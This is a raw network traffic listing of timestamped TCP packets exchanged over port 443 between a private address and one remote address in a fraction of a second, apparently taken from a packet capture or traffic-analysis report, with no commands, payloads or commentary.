Feb 14, 2024 09:08:18.277730942 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.277740955 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.277777910 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.277806044 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.278631926 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.278670073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.278712988 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.278722048 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.278760910 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.278790951 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.279090881 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.279131889 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.279160023 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.279166937 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.279210091 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.279238939 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.279409885 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.279448032 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.279474974 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.279480934 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.279520035 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.279550076 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.280210972 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.280249119 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.280281067 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.280291080 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.280333042 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.281141043 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.281181097 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.281259060 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.281271935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.281296015 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.281337976 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.281362057 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.281367064 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.281404972 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.281445980 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.282202959 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.282241106 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.282277107 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.282284975 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.282315016 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.282342911 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.283018112 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.283056974 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.283092022 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.283098936 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.283140898 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.283174992 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.283871889 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.283910990 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.283946991 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.283955097 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.283998013 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.284024954 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.284028053 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.284045935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.284086943 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.284087896 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.284128904 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.284132957 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.284174919 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.284215927 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.284771919 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.284811020 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.284843922 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.284851074 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.284893990 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.284925938 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.285526037 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.285567045 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.285602093 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.285609961 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.285649061 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.285679102 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.285697937 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.285737038 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.285763025 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.285767078 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.285811901 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.286634922 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.286674023 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.286708117 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.286715031 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.286756039 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.286787033 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.287355900 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.287395000 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.287430048 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.287440062 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.287478924 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.287508011 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.288033962 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.288074970 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.288109064 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.288124084 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.288160086 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.288187981 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.288290024 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.288330078 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.288356066 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.288361073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.288403034 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.288435936 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.289177895 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.289213896 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.289251089 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.289261103 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.289299011 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.289329052 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.289906025 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.289954901 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.289992094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.289999008 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.290047884 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.290132046 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.290174007 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.290544033 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.290550947 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.290600061 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.291060925 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.291100025 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.291136980 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.291142941 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.291171074 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.291205883 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.291897058 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.291939020 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.291977882 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.291985989 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.292031050 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.292059898 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.292455912 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.292495012 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.292531967 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.292538881 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.292579889 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.292610884 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.292637110 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.292676926 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.292722940 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.292727947 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.292769909 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.292798996 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.293569088 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.293608904 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.293632984 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.293642044 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.293669939 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.293689966 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.294306993 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.294346094 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.294365883 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.294372082 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.294404030 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.294425011 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.294487953 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.294526100 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.294544935 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.294549942 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.294585943 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.295448065 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.295486927 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.295507908 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.295516968 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.295537949 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.295559883 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.296247959 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.296286106 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.296302080 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.296309948 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.296348095 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.296365023 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.296839952 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.296880007 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.296909094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.296916962 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.296942949 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.296962976 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.297008038 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.297049046 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.297064066 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.297069073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.297106981 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.297940016 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.297979116 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.298010111 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.298017979 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.298039913 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.298069954 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.298851013 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.298890114 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.298927069 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.298933983 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.298963070 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.298984051 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.298995018 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.299035072 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.299052000 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.299066067 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.299097061 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.299117088 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.299789906 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.299828053 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.299851894 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.299860001 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.299889088 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.299911976 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.300492048 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.300529957 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.300554991 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.300561905 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.300590038 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.300611019 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.301182032 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.301220894 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.301246881 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.301254034 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.301285028 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.301304102 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.301354885 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.301393986 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.301414967 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.301419973 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.301450014 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.301471949 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.302268982 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.302306890 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.302330971 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.302339077 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.302365065 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.302387953 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.302968025 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.303008080 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.303031921 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.303037882 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.303076029 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.303301096 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.303344011 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.303364992 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.303370953 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.303395033 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.303419113 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.304161072 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.304199934 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.304222107 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.304230928 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.304260015 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.304280043 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.304923058 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.304960012 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.304980993 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.304987907 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.305041075 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.305429935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.305468082 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.305531025 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.305543900 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.305557013 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.305581093 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.305692911 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.305730104 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.305738926 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.305771112 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.305777073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.305809975 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.305831909 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.306044102 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.306607008 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.306648016 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.306682110 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.306689978 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.306726933 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.306756020 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.307497978 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.307535887 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.307570934 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.307580948 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.307616949 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.307645082 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.307648897 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.307668924 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.307713032 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.307713985 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.307754993 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.307760000 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.307799101 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.307842970 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.308401108 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.308438063 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.308464050 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.308471918 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.308510065 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.308538914 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.309220076 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.309257984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.309295893 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.309304953 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.309335947 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.309357882 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.309643984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.309683084 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.309710026 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.309715986 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.309746981 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.309770107 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.309988976 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.310029030 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.310055971 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.310060978 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.310091019 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.310111046 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.310833931 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.310870886 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.310902119 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.310908079 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.310937881 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.310957909 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.310987949 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.311028004 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.311058998 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.311064005 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.311091900 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.311114073 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.311830997 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.311872005 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.311903954 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.311908007 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.311938047 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.311958075 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.312671900 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.312712908 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.312745094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.312750101 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.312781096 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.312800884 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.312858105 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.312896967 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.312926054 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.312928915 CET	443	49712	172.67.215.45	192.168.2.5
